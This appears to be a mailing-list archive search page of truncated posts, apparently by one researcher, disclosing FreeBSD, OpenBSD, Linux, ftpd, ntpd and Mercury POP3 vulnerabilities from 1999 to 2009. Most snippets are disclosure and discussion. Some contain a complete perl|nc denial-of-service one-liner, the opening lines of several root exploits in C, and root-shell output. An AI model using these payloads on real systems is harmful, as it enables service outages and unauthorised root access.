FreeBSD 7.2 and below (including 6.4) are vulnerable to race condition in VFS
and devfs code, resulting in NULL pointer dereference. In contrast to pipe race
condition, this vulnerability is actually much harder to exploit.
Due to uninitalised value in devfs_open(), following function is called wi
FreeBSD 6.4 and below are vulnerable to race condition between pipeclose() and
knlist_cleardel() resulting in NULL pointer dereference. The following code
exploits vulnerability to run code in kernel mode, giving root shell and
escaping from jail.
http://www.frasunek.com/pipe.txt
The bug was fixe
Przemyslaw Frasunek pisze:
> FreeBSD <= 6.1 suffers from classical check/use race condition on SMP
There is yet another kqueue related vulnerability. It affects 6.x, up to
6.4-STABLE. FreeBSD security team was notified on 29th Aug, but there is no
response until now, so I won't
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
FreeBSD <= 6.1 suffers from classical check/use race condition on SMP
systems in kevent() syscall, leading to kernel mode NULL pointer
dereference. It can be triggered by spawning two threads:
1st thread looping on open() and close() syscalls, and the
Tavis Ormandy pisze:
> Linux NULL pointer dereference due to incorrect proto_ops initializations
> -
Quick and dirty exploit for this one:
http://www.frasunek.com/proto_ops.tgz
--
* Fido: 2:480/124 ** WWW: http://www.frasun
Użytkownik Janusz Niewiadomski napisał:
This bug may be non-exploitable if size of the buffer is greater than
MAXPATHLEN characters. This may occur for example if wu-ftpd is compiled
with some versions of Linux kernel where PATH_MAX (and MAXPATHLEN
accordingly) is defined to be exactly 4095 charac
Jonas Eriksson <[EMAIL PROTECTED]> napisal(a):
> o Fixed a security hole in prompt rewriting found by Global InterSec.
Looks like, it won't be easy to exploit.
There are possible few scenarios: using a unlink() or frontlink()
macro in chunk_alloc() or chunk_free(). In both cases we can control
There is a local root compromise in OpenBSD 3.0-current (and below, before 8 Apr
2002).
Full problem report and exploit below. FreeBSD is not vulnerable.
- Forwarded message from [EMAIL PROTECTED] -
From: [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Subject: user/2536: possible root comprom
> It still seems to be affected under 3.5beta9 (including this version)
> someone said it's not the problem of exploitable vulnerability about 8
month ago ,
FreeBSD is not affected. Problem was fixed 9 months ago and advisory was
issued. See:
ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/Fre
> > http://www.frasunek.com/sources/security/rexec/
> This workaround not complete, because it doesn't protect for the bug
> exploitation. For example the attacker can send the shellcode via stdin
> to the suid program. It's address can also be determined with removing
> the suid bit from the prog
> This problem has fixed and the exploit didn't work for last
> 4.3-RELEASE FreeBSD.
Exploit *works* even for 4.3-STABLE, before correction date (2 Jul 2001):
riget:venglin:~> ./v
vvfreebsd. Written by Georgi Guninski
shall jump to bfbffe72
child=57660
Password:done
# id
uid=0(root) gid=1001(use
> Well, after a bunch of tests I've found only two suids which gave me
> suid shell:
> /usr/bin/passwd
> /usr/local/bin/ssh1
/usr/bin/su also works for me:
riget:venglin:~> egrep -e execl vvfreebsd.c
if(!execl("/usr/bin/su","su","szymon",0))
riget:venglin:~> ./v
vvfreebsd. Written by Georgi G
> FreeBSD 4.3 local root, yet Linux and *BSD much better than Windows
This problem was already reported to FreeBSD Security Officer about two
months ago, but it was totally ignored.
--
* Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NIC-HDL: PMF9-RIPE *
* Inet: [EMAIL PROTECTED] ** PGP: D4
On Thu, Jun 14, 2001 at 05:14:46PM +0300, Georgi Guninski wrote:
> OpenBSD 2.9,2.8
> Have not tested on other OSes but they may be vulnerable
FreeBSD 4.3-STABLE isn't vulnerable. Looks like it's dropping set[ug]id
privileges before allowing detach.
--
* Fido: 2:480/124 ** WWW: http://www.frasun
On Tue, Apr 24, 2001 at 01:09:59PM +0300, Atro Tossavainen wrote:
> My colleague reports that NetWare servers running Mercury 1.48 crash
> happily.
I've tested it on Mercury 1.48 on Netware 4.10 and it crashed. Mercury 1.48
on Netware 4.11 didn't crashed.
--
* Fido: 2:480/124 ** WWW: http://www.
On Sat, Apr 21, 2001 at 10:52:15AM +0200, Przemyslaw Frasunek wrote:
> All versions of widely-used POP3 server from Mercury MTA package for Netware
> are vulnerable to remote buffer overflow allowing to crash Netware server:
Actually, problem was fixed in Mercury 1.48, but no advisory was
Hello,
All versions of widely-used POP3 server from Mercury MTA package for Netware
are vulnerable to remote buffer overflow allowing to crash Netware server:
perl -e 'print "APOP " . "a"x2048 . " " . "a"x2048 . "\r\n"' | nc host 110
Remote execution of malicious code is also theoretically poss
On Sat, Apr 14, 2001 at 04:41:43PM -0400, fish stiqz wrote:
> If anyone gets this working on other systems, let me know.
This is another version of globbing exploit, written about week ago. It
creates only one directory.
#!/usr/bin/perl
##
On Thu, Apr 05, 2001 at 10:56:45PM -0500, Stephen Clouse wrote:
> Having no effect on ntp-4.0.99k compiled from official source on Slackware
> 7.0. Exploit says /tmp/sh was spawned but it never actually runs (/bin/bash
> mode didn't change).
As I said, exploiting this overflow isn't so easy -- o
/* ntpd remote root exploit / babcia padlina ltd. <[EMAIL PROTECTED]> */
/*
* Network Time Protocol Daemon (ntpd) shipped with many systems is vulnerable
* to remote buffer overflow attack. It occurs when building response for
* a query with large readvar argument. In almost all cases, ntpd is
On Wed, Mar 07, 2001 at 04:40:05AM +0100, Nomen Nescio wrote:
> this is an exploit for wu-ftpd 2.6.1(1) on linux
> propz to segv for giving this to me
This is an old wuftpd 2.6.0 SITE EXEC exploit. 2.6.1 is not vulnerable
to this attack.
> strcpy (cmdbuf, "SITE EXEC ");
> for (ret = 0; ret <
On Fri, Feb 02, 2001 at 03:08:12PM -0800, Ted U wrote:
> tested on qnx rtp as released on jan. 18 from get.qnx.com. doesn't work.
> i tried significantly more a's and nothing happens. i get the normal
> repsonse from stat.
Are you sure? This is output from the same version of QNX RTP, downloade
On Fri, Feb 02, 2001 at 03:04:31PM -0800, Kris Kennaway wrote:
> > BTW. Old BSD derived ftpd is also used in opieftpd and SSLftpd. Both are
> > vulnerable to this attack.
> In case anyone is wondering how old is old:
The same problem persists in heimdal / kerberosIV ftpd implementation:
hei
QNX RTP uses a BSD derived FTP server, which is vulnerable to strtok()
based stack overflow.
Offending code from ftpd/popen.c:
char **pop, *argv[100], *gargv[1000], *vv[2];
for (argc = 0, cp = program;; cp = NULL)
if (!(argv[argc++] = strtok(cp, " \t\n")))
Hello,
Mars_nwe 0.99.pl19 is vulnerable to remote format string vulnerability,
allowing to gain superuser privileges from DOS/Windows workstations
attached to mars server.
Here is the patch:
--- tools.c.origFri Jan 26 22:46:34 2001
+++ tools.c Fri Jan 26 22:46:59 2001
@@ -189,7 +18
Another examples of bad coding in ftp daemons, proftpd-1.2.0rc2 in this case.
main.c:659:
void main_exit(void *pv, void *lv, void *ev, void *dummy)
{
int pri = (int) pv;
char *log = (char *) lv;
int exitcode = (int) ev;
log_pri(pri, log); /* here */
main_exit() is called by shutdown_e
Hello,
There are two non-exploitable format string bugs in wuftpd 2.6.1.
ftpd.c:6272
if (debug) {
char *s = calloc(128 + strlen(remoteident), sizeof(char));
if (s) {
int i = ntohs(pasv_addr.sin_port);
sprintf(s, "PASV port %i assigned to %s", i, remot
> Furthermore, it is not actually a vulnerability. It seems that setuid
> programs will not accept an alternate termcap file via TERMCAP even under
> the old version of ncurses in FreeBSD 3.x. Therefore this "exploit" can
> only be used on your own binaries.
Sure?
lubi:venglin:~> uname -a
FreeBS
/* (c) 2000 babcia padlina / buffer0verfl0w security (www.b0f.com) */
/* freebsd mtr-0.41 local root exploit */
#include
#include
#include
#include
#define NOP 0x90
#define BUFSIZE 1
#define ADDRS 1200
long getesp(void)
{
__asm__("movl %esp, %eax\n");
}
_
b u f f e r 0 v e r f l 0 w s e c u r i t y a d v i s o r y # 3
Advisory Name: libncurses buffer overflow
Date: 24/4/00
On Tue, Mar 07, 2000 at 09:14:32PM -, Lamagra Argamal wrote:
> On FreeBSD dump has the same hole i describes in my previous post. Only it is
>exploitable :-)
but on freebsd, dump is only sgid tty.
--
* Fido: 2:480/124 ** WWW: http://www.freebsd.lublin.pl ** NIC-HDL: PMF9-RIPE *
* Inet: [EMA
On 02-Mar-2000 Derek Callaway wrote:
> I believe this overflow is rather difficult to exploit, (although, not
> impossible) as a result of a setuid(getuid()) before the offending code
it does setuid(), but NOT setgid(). still vulnerable.
the major problem is how to pass valid **envp to stack and
On 01-Mar-2000 Derek Callaway wrote:
> (gdb) #0 getenv (name=0x40111a70 "") at ../sysdeps/generic/getenv.c:88
>>From this gdb session, it appears that there _could_ be a problem with
> the way that glibc's time functions behave.
No. getenv() fails because *envp, argc, **argv are AFTER pathname[]
/*
* (c) 2000 babcia padlina / b0f
* (lcamtuf's idea)
*
* redhat 6.1 /usr/bin/man exploit
*/
#include
#include
#include
#include
#define NOP 0x90
#define OFS 1800
#define BUFSIZE 4002
#define ADDRS 1000
long getesp(void)
{
__asm__("movl %esp,
-BEGIN PGP SIGNED MESSAGE-
Babcia Padlina Ltd. Security Advisory (BP-9909:00)
~~
Synopsis:
Cfingerd is vulnerable to local buffer overflow attack.
Vulnerable versions:
Cfingerd 1.4.2 and ea
-BEGIN PGP SIGNED MESSAGE-
On 02-Sep-99 Taneli Huuskonen wrote:
> + snprintf(command, sizeof(command)-1, "mv %s %s 2>&1 >/dev/null" , oldname,
> newname);
>return(system(command));
> }
>
> Without seeing the context, I can't say for sure, but this looks like a
> hole big enough to
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Babcia Padlina Ltd. Security Advisory (BP-9908:01)
~~
Synopsis:
Babcia Padlina Ltd. has discovered many buffer overruns in running
with superuser privili
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
/*
* babcia padlina ltd. (poland, 17/08/99)
*
* your ultimate proftpd pre0-3 exploiting toolkit
*
* based on:
* - adm-wuftpd by duke
* - kombajn do czereśni by Lam3rZ (thx for shellcode!)
*
* thx and greetz.
*/
#include
#
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
- -FW: <[EMAIL PROTECTED]>-
Date: Wed, 25 Aug 1999 09:13:18 +0200 (CEST)
Sender: [EMAIL PROTECTED]
From: Przemyslaw Frasunek <[EMAIL PROTECTED]>
To: Rafal Banaszkiewicz <[EMAIL PROTECTED]>
Subject: RE: fts_print() , find an
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
/*
(c) 1999 babcia padlina ltd. <[EMAIL PROTECTED]>
bug in fts_print function allows to overwrite any file in system, when
running /etc/security script (executed from 'daily' scripts).
affected systems:
- freebsd (all versions)
- probably
40 matches
Mail list logo